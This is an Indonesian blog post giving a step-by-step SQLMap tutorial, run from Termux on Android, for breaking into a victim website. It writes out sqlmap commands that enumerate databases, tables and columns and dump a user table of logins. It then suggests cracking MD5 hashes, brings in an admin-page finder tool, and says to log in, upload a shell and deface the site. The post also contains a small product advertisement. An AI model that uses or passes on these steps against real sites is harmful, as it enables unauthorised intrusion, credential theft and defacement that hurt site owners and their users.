Tutorial simple SQLMap Android

Oke dipostingan kali ini sangat spesial karena admin akan sharing kan tutorial SQLMap sampai login web korban yang berhasil

Postingan tentang SQLmap ini sebelumnya pernah diposting di CyberGD tetapi dalam bentuk repost milik orang lain Tetapi karena saya ingin menunjukan cara gaya bahasa ala CyberGD jadinya saya buat postingan nya kembali oleh saya sendiri yang praktekan

Sebelum ke tutorial admin ingin menawarkan gelang Cablet (Gelang yang berfungsi untuk charger HP dan bisa dipakai) ini spesial dengan harga terjangkau

Jika berminat segera hubungi admin di OA CyberGD ID @rex9180c

Oke, sekarang kita langsung saja ke tutorialnya

1. Pertama siapkan dulu web yang parameternya rentan SQLi, disini sebagai contohnya admin sudah menemukan

2. Selanjutnya masuk ke SQLmap lalu dapatkan database di Termux kalian dengan ketikan perintah

python2 sqlmap.py -u “www.target.com?bego.php?id=1′ – -dbs

Dan berikut contoh penerapan nya (Lihat yang admin beri garis kuning itu adalah nama Database)

3.Nah setelah kita tau nama databasenya, kita pilih databasenya untuk melihat tabel didalam database, Oh iya untuk kalian yang batu pertamakali mencoba pada Database INFORMATION_SCHEMA kalian tidak usah dipilih, karena kita fokus pada database yang digunakan web (Nama nya beda setiap target), oke Langsung saja ketikan

python2 sqlmap.py -u “www.target.com/bego.php?id=1” – -tables -D nama-database

Berikut contoh penerapanya

Bisa kalian lihat isi tablenya sangat banyak yang admin temukan kali ini

4. Setelah ini kita fokus mencari data login ke web (perhatikan gambar untuk nomor 3) disitu table yang menarik adalah webuser jadi admin akan melihat kolom tersebut dengan perintah

python2 sqlmap.py -u “www.target.com/bego.php?id=1” – -columns -D nama-database -T table

Berikut penerapan nya

Nah bisa kalian lihat gambar diatas kolomnya ada asid, email, dll termasuk username dan password.

5. Setelah itu kita bongkar isi kolomnya dengan perintah nge-dump

python2 sqlmap.py -u “www.target.com/bego.php?id=1” – -dump -D nama-database -T table

Nah sampai disini kita tau data login nya, dan beruntungnya admin passwordnya tidak ada encrypt sama sekali 😀 , Karena biasanya kebanyakan target di Hash ke md5 , jika kalian ketemu password tipe Md5 silahkan hash sendiri di Haskiller

Oke, langkah selanjutnya kita mencari admin loginya tetapi admin gunakan tools lokal AF-GD, jadi ikuti dibawah

6. Buat new session di termux kalian

7. Kemudian ketik perintah berikut

git clone https://github.com/expectoviz/AF-GD

Jika tidak bisa berarti anda harus install git

8. Kemudian masuk ke direktori tools itu

cd AF-GD

9. Selanjutnya buka toolsnya dengan

php af.php

Jika tidak bisa berarti anda belum install php, dan jika berhasil maka akan seperti ini

10. Nah kalian lihat gambar diatas, setelah dijalankan masukan url target dan untuk daftar list nya masukan wlist.txt , maka tools akan mencari halaman admin nya sampai ketemu, dan berikut contohnya jika ketemu

11. Tinggal login ke halaman adminya

12. Dan berhasil

Setelah itu bebas mau di upload shell lalu deface, dll itu terserah kalian :v

Sekian tutorial simple SQLmap

Leave a Reply

Alamat email Anda tidak akan dipublikasikan. Ruas yang wajib ditandai *